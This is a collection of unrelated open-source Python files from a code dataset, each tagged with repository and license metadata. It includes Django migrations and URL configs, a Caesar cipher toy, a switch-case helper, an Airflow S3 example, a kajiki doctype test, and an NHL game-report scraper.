                # multi-channel pixel (e.g. RGB): join the components
                return 'x=%1.4f, y=%1.4f, z=%s ' % (x, y, ' '.join(map(str, z)))
            except TypeError:
                # scalar pixel value
                return 'x=%1.4f, y=%1.4f, z=%s ' % (x, y, z)
        else:
            return 'x=%1.4f, y=%1.4f' % (x, y)
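# Hedged usage sketch (editor's addition): wiring update_coord in as a
# matplotlib format_coord callback; numpy/matplotlib and the figure objects
# are assumptions, not part of the original file.
#
#     import numpy as np
#     import matplotlib.pyplot as plt
#     img = np.random.rand(10, 10, 3)
#     fig, ax = plt.subplots()
#     ax.imshow(img, interpolation='nearest')
#     ax.format_coord = formatCoord(img).update_coord
#     plt.show()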
| ChellyD65/patchSorter | lib/formatCoord.py | Python | gpl-2.0 | 556 |
__author__ = 'stuartreid'
class switch(object):
"""
This class provides the functionality we want. You only need to look at
this if you want to know how this works. It only needs to be defined
once, no need to muck around with its internals.
"""
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
        return  # PEP 479: raising StopIteration in a generator is a RuntimeError on Python 3.7+
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
            return False
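# Hedged usage sketch (editor's addition, following the class docstring's
# intent; the values and handler functions below are hypothetical):
#
#     for case in switch(value):
#         if case('a'):
#             handle_a()
#             break
#         if case('b', 'c'):  # matches either value
#             handle_b_or_c()
#             break
#         if case():  # default: no args always matches
#             handle_default()
 | StuartGordonReid/Comp-Finance | Helpers/Switch.py | Python | lgpl-3.0 | 786 |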
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-03-29 14:20
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('genevieve_client', '0004_auto_20160328_1526'),
]
operations = [
migrations.CreateModel(
name='GenevieveUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('genome_upload_enabled', models.BooleanField(default=False)),
('agreed_to_terms', models.BooleanField(default=False)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.RemoveField(
model_name='gennoteseditor',
name='genome_upload_enabled',
),
]
| PersonalGenomesOrg/genevieve | genevieve_client/migrations/0005_auto_20160329_1420.py | Python | mit | 1,067 |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "Django_study.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| zhangyage/Python-oldboy | day13/Django_study/manage.py | Python | apache-2.0 | 255 |
"""
A crypto engine for the 21st century.
"""
import sys
import string
sigma = {chr(65+i): i for i in range(26)}
rotation = None
plain = ''
cypher = ''
codes = []
newCodes = []
cypherList = []
while rotation is None:
try:
rotation = int(input("Choose a number for your cypher: "))
except ValueError:
rotation = int(input("Please choose a number. The number may be positive or negative: "))
continue
if rotation % 26 == 0:
cont = input('This operation will return your message exactly. Continue? [y]es or [n]o: ')
if cont == 'y':
pass
elif cont == 'n':
print("Exiting...")
sys.exit()
elif rotation > 26:
print('The maximum rotation is 26; your number will be treated as if it were {0}.'\
.format(str(rotation % 26)))
mod = rotation % 26
plain = input("Choose a message: ").upper()
for i in plain:
if i == ' ':
codes.append(' ')
elif i in string.punctuation:
codes.append(i)
else:
codes.append(sigma[i])
for i in codes:
if type(i) is int:
newCodes.append((i + mod) % 26)
else:
newCodes.append(i)
for i in newCodes:
if type(i) is int:
cypherList.append(chr(65+i))
else:
cypherList.append(i)
cypher = ''.join(cypherList)
print(cypher)
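# Worked example (editor's addition): with rotation 3, "HELLO, WORLD" becomes
# "KHOOR, ZRUOG": each letter shifts three places, while spaces and
# punctuation pass through unchanged.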
| caioproiete/illacceptanything | code/libcrypto.py | Python | mit | 1,304 |
# pylint: disable=E1120, C0103
from django.conf.urls import url
from thegamesdb import views
urlpatterns = [
url(r'^$', views.search, name='tgb.search'),
url(r'^search.json', views.search_json, name='tgd.search_json'),
url(r'^(\d+).json$', views.detail_to_lutris, name='tgd.detail'),
]
| Turupawn/website | thegamesdb/urls.py | Python | agpl-3.0 | 300 |
# Generated by Django 2.0.6 on 2018-11-09 14:02
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('iati', '0056_auto_20181109_1400'),
]
operations = [
migrations.RenameField(
model_name='documentlink',
old_name='period_target',
new_name='result_indicator_period_target',
),
]
| openaid-IATI/OIPA | OIPA/iati/migrations/0057_auto_20181109_1402.py | Python | agpl-3.0 | 397 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from unittest import TestCase, main
from nine import str
from kajiki.doctype import DocumentTypeDeclaration, extract_dtd
XHTML1 = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" ' \
'"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">'
class TestDTD(TestCase):
def test_dtd(self):
dtd = DocumentTypeDeclaration.by_uri['']
assert dtd.name == 'html5'
assert str(dtd) == '<!DOCTYPE html>', str(dtd)
assert dtd.rendering_mode == 'html5'
dtd = DocumentTypeDeclaration.by_uri[None]
assert dtd.name == 'xhtml5'
assert str(dtd) == '<!DOCTYPE html>', str(dtd)
assert dtd.rendering_mode == 'xml'
dtd = DocumentTypeDeclaration.by_uri[
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"]
assert dtd.name == 'xhtml1transitional'
assert str(dtd) == XHTML1
assert dtd.rendering_mode == 'xml'
def test_extract_dtd(self):
html = '<div>Test template</div>'
markup = XHTML1 + html
extracted, pos, rest = extract_dtd(markup) # The function being tested
assert extracted == XHTML1
assert pos == 0
assert rest == html
dtd = DocumentTypeDeclaration.matching(extracted) # Another function
assert dtd is DocumentTypeDeclaration.by_uri[
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"]
if __name__ == '__main__':
main()
| ollyc/kajiki | kajiki/tests/test_doctype.py | Python | mit | 1,604 |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
from airflow import models
from airflow.providers.amazon.aws.transfers.local_to_s3 import LocalFilesystemToS3Operator
from airflow.utils.dates import datetime
S3_BUCKET = os.environ.get("S3_BUCKET", "test-bucket")
S3_KEY = os.environ.get("S3_KEY", "key")
with models.DAG(
"example_local_to_s3",
schedule_interval=None,
start_date=datetime(2021, 1, 1), # Override to match your needs
catchup=False,
) as dag:
# [START howto_local_transfer_data_to_s3]
create_local_to_s3_job = LocalFilesystemToS3Operator(
task_id="create_local_to_s3_job",
filename="relative/path/to/file.csv",
dest_key=S3_KEY,
dest_bucket=S3_BUCKET,
)
# [END howto_local_transfer_data_to_s3]
| Acehaidrey/incubator-airflow | airflow/providers/amazon/aws/example_dags/example_local_to_s3.py | Python | apache-2.0 | 1,523 |
import logging
from processing.processor import DataProcessor
PROCESSORS = (
# TODO: Implement
)
def run(media_id=None):
logger = logging.getLogger(__name__)
logger.info('generate play media for Media.id=%s', media_id)
result = DataProcessor(PROCESSORS, logger=logger).run(media_id=media_id)
# TODO: Mark media as ready for "play"
"""Optimize media for web, e.g. transcode video (multiple codecs) and pack images, find good screenshot"""
"""Extract screenshot of the video"""
# See http://superuser.com/questions/538112/meaningful-thumbnails-for-a-video-using-ffmpeg
# TODO: Implement generating content, optimized for viewing in browser, e.g. max 2880 x 1800, jpeg / mp4
# TODO: Consider generating "original rotated" media, identical with quality but ready for usage
| askoretskiy/private-photo-cloud | backend/processing/play_media/__init__.py | Python | gpl-3.0 | 814 |
"""
E261
Include at least two spaces before inline comment
"""
| landscape-test/all-messages | messages/pep8/E261.py | Python | unlicense | 64 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
_____ __
/ \ / |
/$$$$$$ |$$ | ______ _______ _______ __ __
$$ | $$/ $$ | / \ / |/ |/ | / |
$$ | $$ | $$$$$$ |/$$$$$$$//$$$$$$$/ $$ | $$ |
$$ | __ $$ | / $$ |$$ \$$ \ $$ | $$ |
$$ \__/ |$$ |/$$$$$$$ | $$$$$$ |$$$$$$ |$$ \__$$ |
$$ $$/ $$ |$$ $$ |/ $$// $$/ $$ $$ |
$$$$$$/ $$/ $$$$$$$/ $$$$$$$/ $$$$$$$/ $$$$$$$ |
/ \__$$ |
$$ $$/
$$$$$$/
'''
from distutils.core import setup
import Classy
import os
import sys
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
sys.exit()
if sys.argv[-1] == 'uninstall':
os.system('pip uninstall Classy')
sys.exit()
if sys.argv[-1] == "install":
os.system('pip install Classy')
sys.exit()
setup(
name='Classy',
version= Classy.__version__,
author='Philip Deuchler',
author_email='pbdeuchler@gmail.com',
packages=['Classy'],
package_data={'': ['LICENSE', 'README.rst']},
scripts=[],
url='http://pypi.python.org/pypi/classy/',
license=open('LICENSE.txt').read(),
description='Abstracted naive Bayes classifier for rest of us (Requires Python 2.7 or later)',
long_description= open('README.rst').read() + '\n\n' +
open('HISTORY.rst').read(),
install_requires=[],
)
 | pbdeuchler/Classy | setup.py | Python | isc | 1,449 |
# Copyright (c) 2015-2019 Jack Morton <jhm@jemscout.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import random
from bs4 import BeautifulSoup
from urllib.request import urlopen, Request
import nhlscrappo.constants as C
from nhlscrappo import GameType, ReportType
class ReportFetcher(object):
"""Responsible for fetching and validating the report fields"""
__docroot = "http://www.nhl.com/"
def __init__(self, season, game_num, game_type, report_type):
self.season = season
self.game_num = game_num
self.game_type = game_type
self.report_type = report_type
self.soup = None
def __random_user_agent(self):
user_agent_list = [ \
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, " \
"like Gecko) Chrome/22.0.1207.1 Safari/537.1", \
"Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 " \
"(KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11", \
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 "\
"(KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6", \
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like " \
"Gecko) Chrome/20.0.1090.0 Safari/536.6", \
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, " \
"like Gecko) Chrome/19.77.34.5 Safari/537.1", \
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like " \
"Gecko) Chrome/19.0.1084.9 Safari/536.5", \
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like " \
"Gecko) Chrome/19.0.1084.36 Safari/536.5", \
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, " \
"like Gecko) Chrome/19.0.1063.0 Safari/536.3", \
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like " \
"Gecko) Chrome/19.0.1063.0 Safari/536.3",\
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3" \
" (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3", \
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like " \
"Gecko) Chrome/19.0.1062.0 Safari/536.3", \
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, " \
"like Gecko) Chrome/19.0.1062.0 Safari/536.3", \
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like " \
"Gecko) Chrome/19.0.1061.1 Safari/536.3", \
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, " \
"like Gecko) Chrome/19.0.1061.1 Safari/536.3", \
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like " \
"Gecko) Chrome/19.0.1061.1 Safari/536.3", \
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like " \
"Gecko) Chrome/19.0.1061.0 Safari/536.3", \
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like " \
"Gecko) Chrome/19.0.1055.1 Safari/535.24", \
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, " \
"like Gecko) Chrome/19.0.1055.1 Safari/535.24"]
return random.choice(user_agent_list)
def __load_html(self, url):
if "http://" in url:
req = Request(url, headers = {
"User-Agent": self.__random_user_agent(), \
"Accept": "text/html,application/xhtml+xml,application/" \
"xml;q=0.9,*/*;q=0.8", \
"Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.3", \
"Accept-Encoding": "none", \
"Accept-Language": "en-US,en;q=0.8", \
"Connection": "keep-alive"})
with urlopen(req) as handle:
html = handle.read()
handle.close()
return BeautifulSoup(html.decode("utf-8", "lxml"))
else:
with open(url, "r") as handle:
html = handle.read()
handle.close()
return BeautifulSoup(html, features="lxml")
def make_soup(self, local = None):
if local:
self.soup = self.__load_html(local)
else:
url = self.__docroot + "scores/htmlreports/" + str(self.season) + \
str(self.season + 1) + "/" + self.report_type.value + "0" + \
str(self.game_type.value) + ("%04i" % self.game_num) + ".HTM"
self.soup = self.__load_html(url)
return self.soup
@property
def season(self):
return self._season
@season.setter
def season(self, value):
if not isinstance(value, int):
raise TypeError("season must be of type int")
if value < C.MIN_SEASON or value > C.MAX_SEASON:
raise ValueError("Only seasons starting from " + \
str(C.MIN_SEASON) + " until " + str(C.MAX_SEASON) + \
" are supported")
self._season = int(value)
@property
def game_num(self):
return self._game_num
@game_num.setter
def game_num(self, value):
if not isinstance(value, int):
raise TypeError("game_num must be of type int")
self._game_num = value
@property
def game_type(self):
return self._game_type
@game_type.setter
def game_type(self, value):
if value in GameType:
self._game_type = value
else:
raise TypeError("game_type must be of type GameType")
@property
def report_type(self):
return self._report_type
@report_type.setter
def report_type(self, value):
if value in ReportType:
self._report_type = value
else:
raise TypeError("report_type must be of type ReportType")
@property
def soup(self):
return self._soup
@soup.setter
def soup(self, value):
if value is not None and not isinstance(value, BeautifulSoup):
raise TypeError("soup must be of type BeautifulSoup")
self._soup = value
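# Hedged usage sketch (editor's addition): the enum member names are
# assumptions based on the imports above, not verified against nhlscrappo.
#
#     fetcher = ReportFetcher(2010, 20, GameType.Regular, ReportType.Roster)
#     soup = fetcher.make_soup()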
| jhm-/nhlscrappo | nhlscrappo/fetcher.py | Python | mit | 7,149 |